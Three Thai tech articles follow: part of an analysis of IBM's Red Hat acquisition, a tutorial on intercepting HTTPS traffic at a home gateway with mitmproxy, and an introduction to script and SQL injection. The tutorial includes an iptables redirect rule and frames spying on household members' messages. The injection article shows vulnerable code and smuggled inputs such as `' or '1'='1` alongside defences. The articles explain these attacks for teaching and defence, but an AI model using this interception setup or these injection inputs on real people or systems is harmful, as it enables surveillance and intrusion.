จึงเป็นเหตุให้การเข้าซื้อ Red Hat เป็นเรื่องที่สมเหตุสมผลกว่าทำเอง ใน[แถลงการณ์ของ IBM](https://newsroom.ibm.com/2018-10-28-IBM-To-Acquire-Red-Hat-Completely-Changing-The-Cloud-Landscape-And-Becoming-Worlds-1-Hybrid-Cloud-Provider) ก็ระบุชัดเจนว่า ซื้อ Red Hat มาเพื่อเป็นผู้ให้บริการไฮบริดคลาวด์อันดับหนึ่ง ตอบรับกระแสการย้ายแอพพลิเคชันเชิงธุรกิจขึ้นตลาวด์ และจัดตำแหน่งของ Red Hat ไปอยู่ในฝ่าย Hybrid Cloud ของ IBM ด้วย (ในแถลงการณ์มีคำว่า hybrid cloud ทั้งหมด 14 ครั้ง) เทคโนโลยีที่ IBM ระบุชื่อว่าสำคัญและสนใจคือ Linux, container, Kubernetes, multi-cloud management, cloud management, automation ซึ่งทั้งสองบริษัทค่อนข้างมาในสายโอเพนซอร์ส ทั้ง Linux, Java, Kubernetes อยู่แล้ว ในแง่ของเทคโนโลยีก็เดินไปด้วยกันได้แบบไม่ผิดแผก การที่ IBM ได้ซอฟต์แวร์ของ Red Hat ไป ทำให้บริษัทมีสถานะเป็นทั้งผู้ให้บริการคลาวด์ (cloud provider) และผู้พัฒนาซอฟต์แวร์สำหรับคลาวด์ สามารถตอบโจทย์ทั้งลูกค้ากลุ่ม public/private/hybrid cloud ทุกรูปแบบ โดยเฉพาะลูกค้าองค์กรที่กำลังเริ่มย้ายระบบเก่าๆ ซอฟต์แวร์เดิมๆ ขึ้นมาบนคลาวด์ ถ้าองค์กรย้ายขึ้นคลาวด์ของ IBM ก็ย่อมได้รายได้เต็มๆ แต่ถ้าลูกค้าย้ายขึ้นคลาวด์ยี่ห้ออื่น (สมมติเป็น AWS) IBM ก็ยังมีรายได้บางส่วนจากไลเซนส์ซอฟต์แวร์ของ Red Hat โมเดลธุรกิจที่ได้ทั้งสองทางแบบนี้ มีอีกบริษัทเดียวที่มีเหมือนกันคือไมโครซอฟท์ (ใช้ Azure ก็ได้เงิน รันวินโดวส์บน AWS ก็ได้เงิน) แต่นั่นมาจากปัจจัยว่าไมโครซอฟท์มีซอฟต์แวร์ระบบปฏิบัติการของตัวเอง ซึ่ง IBM ไม่มี แต่ Red Hat มี ### Red Hat ได้ประโยชน์จากการควบรวมอย่างชัดเจน ผู้ที่สมประโยชน์ที่สุดในการซื้อกิจการครั้งนี้ย่อมเป็น Red Hat เพราะนอกจากผลตอบแทนเป็นตัวเงินแล้ว สิ่งที่ Red Hat จะได้เพิ่มคือ กองกำลังเซลส์ของ IBM ที่มีประสบการณ์ขายซอฟต์แวร์ให้ตลาดองค์กรอย่างโชกโชน [Fortune](https://www.forbes.com/sites/danwoods/2018/10/28/the-sales-staff-why-ibm-buying-red-hat-makes-sense/#2d95847e6502) วิเคราะห์ว่า Red Hat เป็นบริษัทที่มีวัฒนธรรมโอเพนซอร์สแข็งแกร่ง จับใจกลุ่มนักพัฒนาและวิศวกร ผลิตภัณฑ์ของ Red Hat ขายคนกลุ่มนี้ได้ด้วยตัวมันเองอยู่แล้ว แต่ถ้าต้องการขยายไปยังตลาดผู้บริหารธุรกิจระดับสูง (เช่น CIO) ที่ไม่ใช่คนไอทีโดยตรง จำเป็นต้องใช้เซลส์วิ่งเข้าชนเพื่อปิดการขายโครงการใหญ่ๆ แม้ว่า Red Hat มีเซลส์จำนวนหนึ่งแต่ก็เทียบไม่ได้เลยกับจำนวนเซลส์ของบริษัทยักษ์ใหญ่อย่าง IBM, SAP หรือ Oracle ในตัวเลขผลประกอบการของ Red Hat ก็เปิดเผยจำนวนสัญญา (ดีล) ที่บริษัทขายได้ โดยแยกตามมูลค่าของดีล จะเห็นว่ามีดีลที่มีมูลค่าสูงๆ (มากกว่า 10 ล้านดอลลาร์) ไม่เยอะนัก ซึ่งตรงนี้สามารถใช้ความเชี่ยวชาญและคอนเนคชั่นของเซลส์ IBM เข้ามาช่วยปิดได้ Jim Whitehurst ซีอีโอของ Red Hat [อธิบายในบล็อกของบริษัท](https://www.redhat.com/en/blog/red-hat-ibm-creating-leading-hybrid-cloud-provider) ว่าการไปอยู่กับ IBM จะทำให้ Red Hat มีทรัพยากรเพิ่มขึ้นมาก สามารถลงทุนในโครงการใหม่ๆ ได้มากขึ้น และเข้าถึงลูกค้าทั่วโลกได้มากกว่าที่แล้วๆ มา ทีมเซลส์ของ IBM เองก็ได้ประโยชน์ เพราะมีผลิตภัณฑ์พร้อมให้ขายเพิ่มขึ้นอีกมาก แถมเป็นสินค้าที่ถูกทดสอบมาแล้วในตลาดองค์กร เหลือแค่การขยายฐานลูกค้าเท่านั้น [Bloomberg](https://www.bloomberg.com/opinion/articles/2018-10-28/ibm-and-red-hat-are-better-together) ก็วิเคราะห์ประเด็นน่าสนใจว่าถึงแม้ Red Hat เป็นบริษัทที่ดี แต่ยังมีขนาดเล็กเกินไปที่จะต่อกรกับคู่แข่งยักษ์ใหญ่อย่าง AWS หรือ Microsoft การมารวมกับบริษัทที่ใหญ่กว่าอย่าง IBM ย่อมเป็นทางออกที่ดีกับทั้งสองบริษัท นอกจากนี้ ในแง่ของตัวเลขค่าตอบแทน Red Hat ถือว่าขายออกในราคาที่แพงมากคือ 34 พันล้านดอลลาร์ หรือประมาณ 1.12 ล้านล้านบาท และ IBM เสนอราคาซื้อหุ้น Red Hat ที่ราคา 190 ดอลลาร์ต่อหุ้น แพงกว่าราคาหุ้นก่อนประกาศข่าวถึง 60% ผู้ถือหุ้นย่อม "รับทรัพย์" กันไปเต็มๆ จากการซื้อกิจการครั้งนี้ ประเด็นที่น่ากังวลของ Red Hat จึงมีแค่เรื่องวัฒนธรรมองค์กรที่จะต้องเข้ากันได้กับ IBM ที่มีวัฒนธรรมเก่าแก่ยาวนาน แต่การที่ Red Hat จะยังรันเป็นธุรกิจแยกต่างหากจาก IBM บริษัทแม่ ก็น่าจะช่วยคุ้มกันให้ Red Hat ยังรักษาความโดดเด่นของตัวเองได้ต่อไป อย่างน้อยก็ในอนาคตอันใกล้ ### ประโยชน์ของ IBM ยังไม่ชัดเจนมากนัก แต่เป็นก้าวแรกที่ต้องเสี่ยง ฝั่งของ IBM น่าสนใจกว่าเพราะว่าการซื้อ Red Hat ไม่ได้การันตีความสำเร็จว่า IBM จะสามารถยิ่งใหญ่ในตลาดคลาวด์ได้เสมอไป เพราะคู่แข่งรายใหญ่ๆ ทั้ง AWS, Microsoft, Google ก็ไม่ใช่บริษัทระดับธรรมดา การซื้อ Red Hat จึงถือเป็น "ก้าวแรก" ของ IBM ในการเดินเข้าสู่ยุคใหม่ของบริษัท แต่ IBM ก็ยังต้องทำงานอีกมากเพื่อไล่กวดคู่แข่งให้ทัน และกลับมายืนในแถวหน้าของตลาดไอทีองค์กรอีกครั้ง แน่นอนว่าการซื้อกิจการครั้งนี้มีความเสี่ยงไม่น้อย แถมยังเป็นการซื้อกิจการที่มีราคาแพงเป็นประวัติการณ์ของ IBM (แพงที่สุดก่อนหน้านี้คือซื้อ Cognos ในปี 2007 ในราคาประมาณ 4.9 พันล้านดอลลาร์ เทียบกันไม่ได้เลยกับดีลนี้) จึงถือเป็นการเสี่ยงครั้งสำคัญของซีอีโอ Ginni Rometty แต่ถ้าหากไม่กล้าเสี่ยง ไม่กล้าทุ่มเงินเล่นเกมใหญ่ๆ แบบนี้ อนาคตของ IBM คงไม่มีทางอื่นนอกจากเสื่อมถอยลงอย่างช้าๆ นอกจากนี้ การซื้อ Red Hat เพื่อปั้นธุรกิจไฮบริดคลาวด์อาจเป็นทางออกที่ดูดีในระยะกลาง แต่ในระยะยาวแล้วก็มีคำถามว่า ไฮบริดคลาวด์มีอนาคตแค่ไหน เพราะธุรกิจใหม่ๆ ที่เพิ่งก่อตั้งในยุคหลัง เริ่มต้นมาก็ใช้คลาวด์ทั้งหมด 100% ไม่มีเซิร์ฟเวอร์ของตัวเองเลย โครงสร้างพื้นฐานอยู่บน AWS หรือ Azure ทั้งหมด คำถามสำคัญคือบริษัทสตาร์ตอัพรุ่นใหม่ๆ (ที่อนาคตอีก 5-10 ปีจะกลายเป็นบริษัทยักษ์ใหญ่แบบเดียวกับ Twitter หรือ Spotify) มีเหตุผลอะไรที่จะต้องใช้ไฮบริดคลาวด์ นี่เป็นสิ่งที่ IBM+Red Hat ต้องตอบให้ได้เพื่ออยู่รอดให้ได้ในระยะยาว การซื้อกิจการครั้งนี้ยังมีประเด็นเรื่องความทับซ้อนกันของซอฟต์แวร์จากทั้งสองบริษัท (เช่น Cloud Private กับ OpenShift เป็นคู่แข่งกันเองในตลาด Kubernetes) แต่นั่นคงไม่ใช่ประเด็นสำคัญมากนัก เมื่อเทียบกับว่ารวมกันแล้วจะต่อกรกับคู่แข่งยักษ์ใหญ่ (ที่เก่งฉกาจมาก) ได้แค่ไหน
# สร้างระบบดักฟังเว็บเข้ารหัส (เช่น เฟซบุ๊ก) ที่บ้านด้วย mitmproxy เว็บและบริการคอมพิวเตอร์ยุคใหม่ส่วนมากมักเข้ารหัสอย่างแน่นหนาขึ้นเรื่อยๆ ในช่วงเวลาไม่กี่ปีที่ผ่านมา กระบวนการเข้ารหัสเหล่านี้คุ้มครองความเป็นส่วนตัวและความปลอดภัยของผู้ใช้ได้เป็นอย่างดี แต่แน่นอน หากวันดีคืนดีเราเป็นเจ้าของบ้านที่ควบคุมเกตเวย์อินเทอร์เน็ต "ที่บ้าน" ได้โดยไม่มีการตรวจสอบ ไม่มีการถ่วงดุล สามารถทำอะไรได้ตามใจชอบ เราอาจจะเริ่มสงสัยว่าจริงๆ แล้วเราอยากส่องข้อความที่ทุกคนส่งเข้าออกจากบ้านของเราแม้จะเข้ารหัสได้หรือไม่ โครงสร้างความปลอดภัยอินเทอร์เน็ตสร้างขึ้นมาด้วยข้อจำกัดหลายอย่าง โดยเฉพาะแนวคิดระบบไร้ศูนย์กลาง ทำให้ระบบการยืนยันตัวตนเพื่อเข้ารหัส ที่โดยทั่วไปเราเห็นในรูปแบบการเชื่อมต่อ HTTPS (จริงๆ มีการเข้ารหัสที่ไม่ใช่ HTTPS อีกมากมาย แต่คนทั่วไปมักไม่เห็น) การส่งข้อมูลในอินเทอร์เน็ตมีคุณสมบัติสำคัญเทียบกับระบบเครือข่ายคอมพิวเตอร์ในยุคก่อนอินเทอร์เน็ต คือ ข้อมูลการเชื่อมต่อจำนวนมากแชร์เส้นทางระหว่างกัน ทำให้คนดูแลสายเชื่อมต่อข้อมูลอาจจะเห็นข้อมูลการเชื่อมต่อของคนนับล้านคน จุดเชื่อมต่อเหล่านี้ทำหน้าที่เหมือนไปรษณีย์ในแต่ละประเทศ ที่เมื่อเห็นจดหมายมายังที่ทำการไปรษณีย์แล้ว จำเป็นต้องอ่านข้อมูลบางส่วน เพื่อจะรู้ว่าต้องส่งข้อมูลนี้ไปที่ไหนต่อ เช่น โปสการ์ดไปต่างประเทศ ไปรษณีย์ไทยก็จำเป็นต้องอ่านชื่อประเทศปลายทางเพื่อส่งโปสการ์ดไปยังไปรษณีย์ของประเทศปลายทางได้ถูกต้อง แต่หากไม่มีการป้องกันการอ่านอื่น การเข้าไปอ่านเนื้อหาทั้งที่ไม่จำเป็นก็ไม่ใช่เรื่องยากอะไร แต่หากข้อความมีการเข้ารหัสไว้ แม้จะเห็นข้อความก็ไม่สามารถอ่านเข้าใจได้ กระบวนการเข้ารหัสเว็บแยกเป็นสองส่วนคือ การยืนยันตัวตนว่าปลายทางที่เรากำลังสื่อสารอยู่ด้วยนั้นเป็นคนที่เราต้องการสื่อสารด้วยจริงหรือไม่ เมื่อยืนยันได้แล้วจึงสร้างกุญแจเข้ารหัสแลกกันไว้สองฝ่ายเพื่อเข้ารหัสการสื่อสารต่อไป กระบวนการดักฟังเว็บเข้ารหัสมีแนวคิดสำคัญคือ ถ้าเราไปคั่นกลางและหลอกว่าทั้งสองกำลังเชื่อมต่อกันโดยตรง และแลกกุญแจเข้ารหัสกับเครื่องที่คั่นกลาง เครื่องที่คั่นกลางก็จะสามารถอ่านข้อความได้ทั้งหมด การโจมตีแบบนี้เรียกว่า man-in-the-middle attack หรือ MITM ที่เป็นที่มาของชื่อ mitmproxy ที่ใช้ในบทความนี้ ### ดักฟังเว็บเข้ารหัส mitmproxy สามารถดักการเชื่อมต่อ HTTP โดยสร้างใบรับรองปลอมขึ้นทุกครั้งที่มีการเชื่อมต่อ ไม่ว่าจะเชื่อมต่อไปหาเซิร์ฟเวอร์อะไร mitmproxy จะสร้างใบรับรองใหม่ อ้างว่าตัวเองเป็นเซิร์ฟเวอร์นั้นๆ เสมอ การทดสอบ เราติดตั้ง mitmproxy ไว้ในเกตเวย์ที่เป็นลินุกซ์ ในกรณีที่เกตเวย์เป็นเราเตอร์เฉพาะอาจจะต้องคอนฟิกแบบอื่นๆ แต่จะอยู่นอกเหนือขอบเขตบทความนี้ การรันคำสั่ง `mitmproxy -T` จะทำให้ mitmproxy รอรับการเชื่อมต่ออยู่ในพอร์ต 8080 ทันที ในกรณีที่เราต้องการให้ mitmproxy ดักจับการเชื่อมต่อเว็บแบบเข้ารหัส เราต้องส่งการเชื่อมต่อจากพอร์ต 443 (HTTPS) เข้ามายังพอร์ต 8080 ของ mitmproxy iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080 หลังจากนี้เมื่อเราเข้าเว็บอะไรที่เป็นพอร์ต 443 ก็จะถูกตอบกลับด้วย mitmproxy เพื่อบันทึก แต่เนื่องจาก mitmproxy ไม่สามารถยืนยันตัวตนว่าเป็นเจ้าของโดเมนจริงได้ ใบรับรองตัวตนของ mitmproxy ก็จะไม่ได้รับความเชื่อถือ และเบราว์เซอร์ก็จะแจ้งเตือนว่าเว็บนี้ไม่น่าเชื่อถือ อย่างไรก็ดี ถ้าผู้ใช้กดข้ามคำเตือนของเบราว์เซอร์เพื่อเข้าดูเว็บ mitmproxy ก็จะดักข้อมูลทั้งหมด ที่วิ่งผ่านมันได้ทันที ### ความเนียนคือความท้าทาย กระบวนการทำให้ "เนียน" เป็นหัวข้อใหญ่ในการดักฟังเว็บเข้ารหัส ที่ออกแบบมาเพื่อป้องกันการดักฟัง เว็บทั้งโลกที่เข้ารหัส ล้วนถูกตรวจสอบว่าคนที่กำลังแสดงตัวว่าเป็นเจ้าของเว็บนั้นเป็นตัวจริงหรือไม่ หน่วยงานนี้เรียกว่า Certification Authority หรือ CA ทั่วโลกมีมากมายนับไม่ถ้วน แต่ที่เบราว์เซอร์และระบบปฎิบัติการต่างๆ ให้ความเชื่อถือยอมรับว่ามีกระบวนการตรวจสอบที่ดีนั้น มีการกำหนดมาตรฐานความน่าเชื่อถือเอาไว้โดยกลุ่มร่วมระหว่างผู้ผลิตซอฟต์แวร์และหน่วยงานรับรองเว็บเอง โดยรวมทำข้อตกลงกันในชื่อหน่วยงานว่า [CA Browser Forum](https://cabforum.org/) นอกจากนี้แต่ละเบราว์เซอร์ยังกำหนดข้อตกลงเพิ่มเติมของตัวเองได้ เช่น [ตัวอย่างข้อกำหนดของ Mozilla](https://www.mozilla.org/en-US/about/governance/policies/security-group/certs/policy/) mitmproxy เองรองรับการสร้างใบรับรองปลอมด้วย CA ของหน่วยงาน โดยสามารถสร้างใบรับรองที่รับรองโดย CA ที่ระบุได้อัตโนมัติ กระบวนการปกติแล้วจำเป็นต้องเพิ่มใบรับรองของ CA หน่วยงานนี้ให้เบราว์เซอร์ "เชื่อใจ" โดยตรง หากเป็นเครื่องในองค์กร ที่ถูกควบคุมจากฝ่ายไอที เช่น เครื่องที่อยู่ใต้โดเมน องค์กรสามารถเพิ่ม CA ของตัวเองเข้าไปให้กับทุกเครื่องได้ทันที และซอฟต์แวร์ เช่น mitmproxy ก็จะสามารถดักฟังเว็บได้โดยที่เบราว์เซอร์ไม่ขึ้นหน้าจอเตือนใดๆ กระบวนการแบบนี้ใช้กันในองค์กรขนาดใหญ่ที่ต้องการควบคุมการส่งข้อมูลออกนอกองค์กรจากเครื่องคอมพิวเตอร์ขององค์กรเอง การบังคับบางครั้งอาจจะเป็นกระบวนการง่ายๆ คือเปิดไฟล์ CA ให้ดาวน์โหลดไปติดตั้งเอง พร้อมบอกกระบวนการติดตั้งมาให้ ควรตระหนักว่าการติดตั้งไฟล์ CA ลงเครื่องหมายถึงผู้ที่ออก CA นั้นให้เราอาจจะดักฟังเว็บใดๆ ก็ได้ตามต้องการ แม้จะเป็นเว็บเข้ารหัส คำถามสำคัญ คือ ถ้าไม่ใช่เรื่องขององค์กรที่เข้าไปแก้ไขได้โดยตรง จะสามารถดักฟังการเข้ารหัสให้เนียนได้หรือไม่ คำตอบคือ ได้ ถ้าเราสามารถหาใบรับรองที่ "เหมือนจริง" ได้ กรณีเคยเกิดขึ้นในอิหร่าน เมื่อมีผู้พบว่ามีใบรับรองที่รับรองโดเมน [google.com](http://google.com/) แต่ทางกูเกิลไม่ได้ขอ สุดท้ายพบว่าเป็นใบรับรองที่[แฮกมาจาก CA ชื่อ Diginotar](https://www.blognone.com/node/37825) กระบวนการดักฟังนั้นเนียนอย่างสมบูรณ์ หากไม่ใช่เพราะว่าเบราว์เซอร์ Chrome ล็อกไว้ว่าเมื่อเป็นเว็บของกูเกิลต้องใช้ใบรับรองเฉพาะที่ระบุไว้เท่านั้น ใบรับรองอื่นๆ แม้ได้รับการรับรองมาถูกต้อง Chrome ก็จะเตือนอยู่ดี ### ใบรับรองถูกต้องก็ไม่พอ กระบวนการดักฟังการเข้ารหัสโดยไม่สามารถสังเกตได้ยังมีอีกรูปแบบหนึ่ง คือ การควบคุม CA จริงที่ไม่ได้เป็น CA สำหรับภายในองค์กรอย่างเดียว เนื่องจากระบบ CA นั้นรองรับการ "ส่งต่อสิทธิ" (delegate) ความน่าเชื่อถือไปให้หน่วยงานอื่นๆ ได้ root CA ที่ได้รับความเชื่อถือจากเบราว์เซอร์หลัก อาจจะส่งต่อสิทธิ์ให้กับหน่วยงานอื่นๆ อีกนับร้อย CA ที่ได้รับสิทธิแบบส่งต่อมาและ root CA รวมทั้งหมดที่ได้รับความเชื่อถือจากเบราว์เซอร์หลักๆ มีนับร้อยนับพันรายการ CA หลายแห่งเป็นหน่วยงานรัฐบาล ที่เคยมีประเด็นเช่น Etisalat หน่วยงานที่ได้รับสิทธิความน่าเชื่อถือต่อมาจาก CA ของบริษัท Verizon ตัว Etisalat เป็นหน่วยงานที่อยู่ใต้กำกับของรัฐบาลสหรัฐอาหรับเอมิเรตส์ [EFF เคยเรียกร้องให้ Verizon ถอนสิทธิของ Etisalat เสีย](https://www.eff.org/deeplinks/2010/08/open-letter-verizon)เพราะบริษัทเป็นผู้ให้บริการโทรศัพท์มือถือด้วย และเคยส่งอัพเดตปลอมให้กับผู้ใช้ Blackberry ในเครือข่ายนับแสนคน อย่างไรก็ดี Verizon ยังไม่ได้ถอน CA ของ Etisalat และใบรับรองที่ออกโดย Etisalat ก็ยังใช้งานได้ทั่วโลก จนทุกวันนี้ไม่มีใครรู้แน่ชัดว่า CA ที่ได้รับสิทธิต่อมาจาก root CA มีรวมทั้งหมดจำนวนเท่าใดและมีใครบ้าง เพราะไม่มีข้อกำหนดว่า root CA ต้องประกาศ CA ที่ส่งต่อสิทธิไปให้ การได้มาซึ่งใบรับรองปลอมที่เบราว์เซอร์เชื่อถือเป็นกระบวนการที่ค่าใช้จ่ายสูงในแทบทุกทาง ไม่ว่าจะเป็นการแฮกจาก CA ซึ่งเป็นอาชญากรรม และต้องเตรียมการเป็นเวลานาน หรือการสร้าง CA แล้วซื้อสิทธิที่ได้รับส่งต่อมา กระบวนการนี้ดูจะมีประสิทธิภาพดีหากมีความต้องการที่จะดักฟังเว็บทั่วๆ ไป ### กระบวนการต่อสู้กับการดักฟัง แต่ความตระหนกว่าจะมี CA ออกใบรับรองให้กับผู้อื่นที่ไม่ใช่เจ้าของโดเมนเป็นประเด็นสำคัญทั่วโลกมาโดยเสมอ ทุกวันนี้มีการเรียกร้องให้ [CA ทุกรายเปิดรายการใบรับรองที่ได้รับรองให้ไป](https://tools.ietf.org/html/rfc6962)เพื่อให้เจ้าของโดเมนสามารถตรวจสอบได้ว่ามีการออกใบรับรองอย่างไม่ถูกต้องหรือไม่ ในอีกทางหนึ่งเบราว์เซอร์เองเริ่มรองรับการ "ล็อก" CA ให้กับบางเว็บที่มีความนิยมสูง เช่นเดียวกับที่ Chrome ล็อกจนกระทั่งพบว่า DigiNotar ออกใบรับรองโดยไม่ได้รับอนุญาต ทุกวันนี้กระบวนการนี้เปิดให้เว็บขนาดใหญ่สามารถเจรจากับเบราว์เซอร์เพื่อขอให้ล็อกว่าใบรับรองของเว็บตัวเองจะออกโดย CA รายใดได้บ้าง ตัวอย่างเช่นใน Chrome 40 เป็นต้นไป เฟซบุ๊กจะออกใบรับรองได้จาก Symanctec, Digicert, และ CA สำรองของเฟซบุ๊กเองเท่านั้น โดเมนดังๆ ที่มีคนใช้จำนวนมากล้วนเจรจากับเบราว์เซอร์ในรูปแบบเดียวกับ เช่น ทวิตเตอร์, กูเกิล, Dropbox, [torproject.org](http://torproject.org/), หรือเว็บสำรองข้อมูลอย่าง [SpiderOak](https://spideroak.com/features/) สำหรับไฟร์ฟอกซ์เองก็มีนโยบายว่าเว็บใดที่ล็อก CA กับ Chrome แล้วทางไฟร์ฟอกซ์จะล็อกในแบบเดียวกัน กระบวนการเจรจาระหว่างเว็บกับเบราว์เซอร์อาจจะใช้เวลานาน กูเกิลเสนอมาตรฐานใหม่ "[Public Key Pinning Extension for HTTP](http://tools.ietf.org/html/draft-ietf-websec-key-pinning-21)" หรือ HPKP มาตั้งแต่ปี 2011 มีแนวโน้มว่าจะเป็นมาตรฐานเว็บต่อไป มาตรฐานนี้จะเปิดให้เว็บสามารถส่งข้อความแจ้งเบราว์เซอร์ได้ว่าต่อจากนี้จะมีใบรับรองใดถูกต้องบ้าง และหากพบใบรับรองที่ไม่อยู่ในรายการ สามารถเตือนให้เบราว์เซอร์แจ้งเตือนกลับไปยังเซิร์ฟเวอร์ได้ว่ามีใบรับรองน่าสงสัย ทุกวันนี้ยังคงมีเพียง Chrome (38 ขึ้นไป) และ Firefox (35 ขึ้นไป) เท่านั้นที่รองรับมาตรฐานนี้ ### ดักฟังกลายเป็นบล็อคเว็บ กระบวนการดักฟังให้ผู้ใช้ไม่รู้ตัว เป็นเรื่องใหญ่ที่ต้องลงทุนสูงและมีโอกาสพลาดมากมายในช่วงหลัง แต่หากมีองค์กรที่ไม่สนใจอะไรและอยาก "ฟัง" เพียงอย่างเดียวโดยไม่สนใจว่าผู้ใช้จะรู้ตัวหรือไม่ก็ยังคงสามารถทำได้โดยลงทุนไม่มากมายอะไรนัก เช่น mitmproxy ที่ยกตัวอย่างไปสามารถติดตั้งในองค์กรขนาดเล็กได้โดยง่าย แต่มีข้อเสนอเพิ่มเติมในวงการความปลอดภัย คือ [HTTP Strict Transport Security](http://tools.ietf.org/html/rfc6797) ที่เสนอโดยกูเกิล ทำให้เว็บสามารถประกาศตัวเองว่าต้องเข้ารหัสเท่านั้น ทำให้เบราว์เซอร์จะไม่พยายามเข้าเว็บนี้แบบไม่เข้ารหัสอีกเลย แม้ผู้ใช้จะพิมพ์ URL แบบไม่เข้ารหัสก็ตาม (rfc6797 ข้อ 12.1) เว็บที่ล็อก CA มักจะประกาศ HSTS อยู่เสมอ ทุกวันนี้การปลอมใบรับรองเฟซบุ๊กจึงเป็นการบล็อคเว็บไปในตัว เช่นในภาพ Chrome จะไม่แสดงปุ่ม Proceed เพื่อเข้าเว็บหากใบรับรองผิดพลาด
# Script Injection/SQL Injection ความปลอดภัยพื้นฐานสำหรับเว็บ แม้ปัญหาความปลอดภัยจะเริ่มต้นในยุคแรกๆ ในโลกด้วยปัญหา buffer overflow แต่เมื่อโลกเข้าสู่ยุคของเว็บ และโดยเฉพาะเมื่อเว็บเริ่มไม่ใช่ไฟล์ html เปล่าๆ แต่เป็นเว็บที่สามารถปรับตามผู้ใช้งานได้ เริ่มจากยุคของ CGI ที่เป็นโปรแกรมภาษาต่างๆ เรื่อยมาถึงเว็บเซิร์ฟเวอร์แบบอื่นไม่ว่าจะเป็น J2EE หรือระบบ fastcgi ปัญหาความปลอดภัยของเว็บก็กลายเป็นปัญหาใหญ่ที่โลกเจอกันเรื่อยมาจนทุกวันนี้ ปัญหา script injection หรือการใส่สคริปต์เข้ามาในเซิร์ฟเวอร์นั้นเป็นการโจมตีที่ตรงตัวกับชื่อของมัน เมื่อเซิร์ฟเวอร์เปิดให้อัพโหลดไฟล์เข้าไปยังเซิร์ฟเวอร์ ไม่ว่าจะเป็นการอัพโหลดภาพ หรือการอัพโหลดไฟล์อื่นๆ ในเว็บเซิร์ฟเวอร์ที่รันไฟล์ภาษาสคริปต์นั้น โดยทั่วไปแล้วจะถูกคอนฟิกให้รันทุกไฟล์สคริปต์ เช่น เว็บเซิร์ฟเวอร์ Apache ที่ติดตั้ง PHP ทุกวันนี้จะถูกคอนฟิกให้รันทุกไฟล์ที่ลงท้ายชื่อไฟล์ด้วย ".php" เว็บแอพพลิเคชั่นที่ไม่ระมัดระวังเพียงพอจะปล่อยให้มีการอัพโหลดชื่อไฟล์ที่ตรงตามเงื่อนไขของสคริปต์ ส่งผลให้แฮกเกอร์สามารถส่งไฟล์ใดๆ ขึ้นมารันบนเครื่อง และเมื่อรันแล้วจะได้สิทธิเท่ากับเว็บเซิร์ฟเวอร์ทุกประการ เช่น การอ่านไฟล์ทั้งหมด, การอ่านฐานข้อมูล (เพราะสามารถอ่านไฟล์คอนฟิกของเว็บแอพพลิเคชั่นได้) จนกระทั่งในเซิร์ฟเวอร์รุ่นเก่าๆ นั้น นิยมตั้งให้เว็บเซิร์ฟเวอร์ทำงานในฐานะผู้ใช้ root จะส่งผลให้การเผอเรอเพียงการปล่อยให้ผู้ใช้อัพโหลดไฟล์โดยไม่ตรวจสอบเพียงจุดเดียวสร้างความเสียหายได้อย่างมาก ระบบจัดการเนื้อหารุ่นใหม่ๆ เมื่อมีส่วนใดที่ต้องรับไฟล์อัพโหลดจากผู้ใช้ มักจะจัดให้อยู่ในโฟลเดอร์เดียวกันทั้งหมด พร้อมกับตรวจสอบชื่อไฟล์ว่าไม่มีชื่อไฟล์ใดที่จะสามารถรันได้ เช่น การจำกัดชื่อไฟล์ให้รับเฉพาะไฟล์ที่ไม่สามารถรันได้ เช่นไฟล์ PNG, JPG หรือ PDF ใน กระบวนการรักษาความปลอดภัยจึงอาจจะทำได้โดยการคอนฟิกยกเลิกไม่ให้เว็บเซิร์ฟเวอร์รันสคริปต์ใดๆ ในโฟลเดอร์ที่ใช้สำหรับการรับไฟล์อัพโหลด และหากต้องการเพิ่มประเภทไฟล์ที่รับอัพโหลด ควรระวังไม่รับไฟล์ที่สามารถรันบนเซิร์ฟเวอร์ได้ เช่น สคริปต์ภาษาต่างๆ รวมถึงภาษาที่อาจจะไม่ได้ใช้งาน อย่างภาษา Perl (.pl) นอกจากการอัพโหลดไฟล์แล้ว หลายครั้งสคริปต์ในการรันนั้นมีการนำอินพุตของผู้ใช้ไปเชื่อมกับสตริงเพื่อสร้างคำสั่งใหม่ $myvar = 'somevalue'; $x = $_GET\['arg'\]; eval('$myvar = ' . $x . ';'); คำสั่งเช่นนี้เปิดโอกาสให้ผู้ที่ใส่อินพุตเพื่อมุ่งร้ายต่อระบบสามารถเพิ่มคำสั่งอื่นๆ เช่น การใส่อินพุตเป็น `10; system('/bin/echo uh-oh')` ทำให้อินพุตเช่นนี้สามารถรันคำสั่งใดๆ ก็ได้ตามที่ผู้ใช้ที่มุ่งร้ายต้องการในสิทธิเท่ากับที่เว็บเซิร์ฟเวอร์สามารถทำได้ กระบวนการนี้เจาะผ่านช่องโหว่ที่ซอฟต์แวร์กลั่นกรองอินพุตจากผู้ใช้ไม่ดีพอเช่นนี้เป็นปัญหาที่พบบ่อย โดยเฉพาะการใช้งานกับระบบฐานข้อมูล SQL ที่สคริปต์เว็บต่างๆ ต้องสร้างคำสั่ง SQL ไปยังฐานข้อมูล เราเรียกช่องโหว่เช่นนี้ว่า SQL Injection ตัวอย่างเช่นการสร้าง SQL จากอินพุต $statement = "SELECT * FROM users WHERE name = '" + userName + "';"; ในคำสั่งเช่นนี้ไม่มีการตรวจสอบตัวแปร userName ที่เป็นอิตพุตก่อนใช้งาน อินพุตที่มุ่งร้ายอาจจะเป็น `' or '1'='1` ทำให้คำสั่ง SQL สุดท้ายกลายเป็นเป็น การเรียกรายชื่อผู้ใช้ทั้งหมดจากฐานข้อมูล SELECT * FROM users WHERE name = '' OR '1'='1'; คำสั่งที่มุ่งร้ายในการดึงข้อมูลออกมาจากฐานข้อมูลเป็นแหล่งสำคัญที่เว็บต่างๆ ถูกเจาะฐานข้อมูลออกมา ผู้ร้ายบางส่วนอาจจะใช้ช่องโหว่แบบเดียวกันลบฐานข้อมูลออกไปทั้งหมด สร้างความเสียหายให้กับระบบมากยิ่งขึ้น ระบบจัดการเนื้อหา และเว็บเฟรมเวิร์ครุ่นใหม่ๆ ทั้งหมดล้วนมีกระบวนการกรองอินพุตผู้ใช้ สำหรับคำสั่ง SQL นั้นการพัฒนาเว็บในช่วงหลังจะไม่แนะนำให้สร้างคำสั่ง SQL โดยตรงอีกต่อไป แต่แนะนำให้ครอบคำสั่งด้วยด้วยชั้นซอฟต์แวร์ เช่น ORM (object-relational mapping) ทำให้ผู้ใช้ที่มุ่งร้ายไม่สามารถสร้างโค้ดคำสั่งนอกเหนือจากรูปแบบที่เราต้องการได้อีกต่อไป สำหรับ PHP ที่นิยมใช้ทำเว็บนั้น ในรุ่นหลังๆ มีการเพิ่มชั้น PHP Data Objects (PDO) 